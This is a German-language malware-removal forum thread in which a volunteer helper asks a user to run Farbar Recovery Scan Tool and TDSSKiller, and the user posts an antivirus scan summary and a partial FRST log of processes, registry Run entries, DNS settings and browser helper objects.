C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\Program Files (x86)\Samsung\Samsung Magician\Rapid\Rapid_Upgrade.dll=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Help.pdf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/install.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/LIMITATIONS.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/RELEASE_NOTES.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win7_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidDiskFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/amd64/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/SamsungRapidSvc.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_amd64/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/dp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/addfilter.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/DIFxAPI.dll
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/i386/SamsungRapidFSFltr.sys
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/rp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidApp.exe
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidDiskFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.cat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/CacheFilter/SamsungRapidFSFltr.inf
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/OpenSourceAnnouncement.txt
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/RAPIDCollectLogs.bat
Password-protected
Not scanned (file was password-protected)
C:\ProgramData\Samsung\Backup\Samsung_Magician_ML_Setup_Backup.exe=>(Instyler o)=>(Instyler Module 593)=>(ZIP Sfx r)=>Rapid/Win8_i386/RAPID/Tools/RAPIDCollectLogs/README.txt
Password-protected
Not scanned (file was password-protected)
[-]Detailed Scan Summary
[-]Basic
Scanned items : 2328487
Infected items : 0 (no infected items have been detected)
Suspicious items : 0 (no suspected items have been detected)
Resolved items : 0 (no threats have been detected during this scan)
Unresolved items : 0 (no issues remained unresolved)
[+]Advanced
[-]Scan Options
[-]Target Threat Types:
Scan for viruses : Yes
Scan for adware : Yes
Scan for spyware : Yes
Scan for applications : Yes
Scan for dialers : Yes
Scan for rootkits : Yes
Scan for keyloggers : Yes
[-]Target Selection Options:
Scan registry keys : Yes
Scan cookies : Yes
Scan boot sectors : Yes
Scan memory processes : Yes
Scan archives : Yes
Scan runtime packers : Yes
Scan emails : Yes
Scan all files : Yes
Heuristic Scan : Yes
Scanned extensions : none configured
Excluded extensions : none configured
[-]Target Processing:
Default primary action for infected objects : None
Default secondary action for infected objects : None
Default primary action for suspicious objects : None
Default secondary action for suspicious objects : None
Default action for hidden objects : Disinfect
Default action for password-protected objects : Log as not scanned
[-]Scan engines summary
Number of virus signatures : 8811655
|
|
21.05.2017, 19:44
| #3 |
| /// TB-Ausbilder   | Trojaner, Adware oder sonstiges ? Mein Name ist Matthias und ich werde dir bei der Bereinigung deines Computers helfen. Um die Bereinigung möchlichst effektiv und schnell gestalten zu können, bitte ich um Beachtung der folgenden Hinweise:
Bitte arbeite alle Schritte in der vorgegebenen Reihefolge nacheinander ab und poste alle Logdateien in CODE-Tags:  So funktioniert es:Posten in CODE-Tags Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR, 7Z-Archive zu packen erschwert deinem Helfer massiv die Arbeit, es sei denn natürlich die Datei wäre ansonsten zu groß für das Forum. Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
Danke für deine Mitarbeit! Schritt 1 Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop:  FRST 32-Bit | FRST 64-Bit(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
Schritt 2 Downloade dir bitte  TDSSKiller.exe und speichere diese Datei auf dem Desktop
Bitte poste mit deiner nächsten Antwort
|
|
21.05.2017, 20:13
| #4 |
| | Trojaner, Adware oder sonstiges ? Hallo Matthias, ich bin David. vielen Dank für deine Unterstützung. Anbei die geforderten Logs. Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 20-05-2017
durchgeführt von Dino (Administrator) auf **** (21-05-2017 21:04:57)
Gestartet von D:\Dino\Downloads
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(AO Kaspersky Lab) D:\Dino\Downloads\tdsskiller.exe
(AO Kaspersky Lab) C:\Users\Dino\AppData\Local\Temp\{F74CDBD7-0132-474B-A4A1-3396D3D0D72B}\{F7FBBE79-94C0-4F7E-B4EF-32EDEA81ED75}.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
GroupPolicyScripts-x32: Beschränkung <======= ACHTUNG
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 82.163.143.157 82.163.142.159
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
